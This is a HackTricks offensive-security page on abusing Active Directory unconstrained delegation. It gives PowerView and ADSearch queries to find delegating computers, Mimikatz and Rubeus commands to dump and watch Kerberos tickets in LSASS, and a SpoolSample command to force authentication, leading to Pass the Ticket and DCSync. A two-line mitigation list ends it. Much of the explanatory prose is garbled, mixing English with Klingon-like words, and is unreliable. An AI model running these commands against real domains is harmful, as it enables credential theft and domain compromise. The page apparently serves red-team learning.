5.3 KiB
Unconstrained Delegation
htARTE (HackTricks AWS Red Team Expert) !HackTricks AWS Red Team Expert!
- Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
- Discover The PEASS Family, our collection of exclusive NFTs
- Get the official PEASS & HackTricks swag
- Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦@carlospolopm.
- Share your hacking tricks by submitting PRs to the hacktricks repo and hacktricks-cloud repo.
Unconstrained Delegation
Unconstrained Delegation: Computer jup 'ej Domain Administrator vItlhutlh. vaj, user logins Computer, TGT copy user TGS sent DC 'ej memory LSASS saved. So, Administrator privileges machine, dump tickets impersonate users.
vaj Domain Admin logins Computer 'ej "Unconstrained Delegation" feature activated, 'ej local admin privileges machine, dump ticket impersonate Domain Admin (domain privesc).
Computer objects attribute find userAccountControl attribute contains ADS_UF_TRUSTED_FOR_DELEGATION. LDAP filter 'ej ' (userAccountControl:1.2.840.113556.1.4.803:=524288) ' check:
# List unconstrained computers
## Powerview
Get-NetComputer -Unconstrained #DCs always appear but aren't useful for privesc
## ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
# Export tickets with Mimikatz
privilege::debug
sekurlsa::tickets /export #Recommended way
kerberos::list /export #Another way
# Monitor logins and export new tickets
.\Rubeus.exe monitor /targetuser:<username> /interval:10 #Check every 10s for new TGTsMimikatz Rubeus Load Administrator (victim user) ticket memory Pass the Ticket Pass the Ticket.
More info: https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/
More information about Unconstrained delegation in ired.team.
Force Authentication
Unconstrained Delegation compromise computer 'ej Print server automatically login saving TGT memory server.
vaj, Pass the Ticket attack impersonate user Print server computer account.
SpoolSample use:
.\SpoolSample.exe <printmachine> <unconstrinedmachine>
ghItlh TGT vItlhutlh domain controller, 'oH DCSync attack jatlh je 'ej DC vItlhutlh hashmey De'.
More info about this attack in ired.team.
Here are other ways to try to force an authentication:
{% content-ref url="printers-spooler-service-abuse.md" %} printers-spooler-service-abuse.md {% endcontent-ref %}
Mitigation
- Limit DA/Admin logins to specific services
- Set "Account is sensitive and cannot be delegated" for privileged accounts.
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
- Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
- Discover The PEASS Family, our collection of exclusive NFTs
- Get the official PEASS & HackTricks swag
- Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦@carlospolopm.
- Share your hacking tricks by submitting PRs to the hacktricks repo and hacktricks-cloud repo.